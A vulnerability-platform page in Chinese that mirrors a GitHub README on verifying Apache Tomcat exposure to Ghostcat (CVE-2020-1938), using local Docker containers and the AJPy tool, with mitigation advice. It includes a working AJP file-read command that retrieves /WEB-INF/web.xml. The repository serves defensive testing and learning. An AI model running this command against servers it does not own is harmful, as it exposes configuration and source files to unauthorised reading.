漏洞平台

POC详情： 62ff185deccce0cc75a03f992137e2ea511da21a

来源

https://github.com/shaunmclernon/ghostcat-verification

关联漏洞

标题： Apache Tomcat 安全漏洞 (CVE-2020-1938)
描述：Apache Tomcat是美国阿帕奇（Apache）基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page（JSP）的支持。 Apache Tomcat 7.0.100版本之前的7.*版本、8.5.51版本之前的8.*版本和9.0.31版本之前的9.*版本中的Tomcat AJP协议存在安全漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件，如 webapp 配置文件或源代码等。

描述

Learnings on how to verify if vulnerable to Ghostcat (aka CVE-2020-1938)

介绍

# Ghostcat verification (CVE-2020-1938)

## Summary

A new exploit called Ghostcat has been found [CVE-2020-1938], see the articles on [snyk] and [tenable] for details and analysis of the exploit itself.

In my case, I wanted to verify which Tomcat servers are exploitable and if so how does it manifest itself. So this experiment is to check Tomcat 7, 8 and 9.

## Prerequsites

- docker
- python
- git

## Reading file using CVE-2020-1938 on Tomcat 7

>TODO: How to verify a Tomcat 7 is vulnerable?

## Reading file using CVE-2020-1938 on Tomcat 8

Rather than testing exploits on live servers, I am using existing builds of Tomcat to perform my experiment using [AJPy] which crafts AJP requests in order to communicate with AJP connectors.

```bash
git clone --recurse-submodules git@github.com:shaunmclernon/ghostcat-verification.git
cd ghostcat-verification/AJPy
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```

If it returns the web.xml then this version of Tomcat is vulnerable to the exploit.

If we try the same test using the latest version of Tomcat 8.5 we can see it is not vulnerable to this particular error.

```bash
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```

In this case, we should get a python error, which actually means the server is not vulnerable;

```bash
Traceback (most recent call last):
  File "tomcat.py", line 377, in <module>
    hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
    ...
    ...
struct.error: unpack requires a buffer of 5 bytes
```

## Reading file using CVE-2020-1938 on Tomcat 9

>TODO: How to verify a Tomcat 9 is vulnerable?

## Springboot

>TODO: How to verify a springboot service is vulnerable?

### Mitigation

Obviously if vulnerable (regardless of the version), you should consider upgrading the to the patched versions. One other option is block access to the AJP port.

Start the same Tomcat version but do not expose the AJP port 8009.

```bash
docker run --name tomcat --rm -d -p 8080:8080 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```

In this case, we can see that it will fail to exploit the server.

## Disclaimer

I am not a security professional and this repo was built for my learning purposes, it is not intended to be used for malicious purposes.

[CVE-2020-1938]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938
[snyk]: https://snyk.io/blog/ghostcat-breach-affects-all-tomcat-versions/
[tenable]: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
[AJPy]: https://github.com/hypn0s/AJPy

文件快照


 [4.0K]  /data/pocs/62ff185deccce0cc75a03f992137e2ea511da21a
├── [4.0K]  AJPy
└── [2.8K]  README.md

1 directory, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。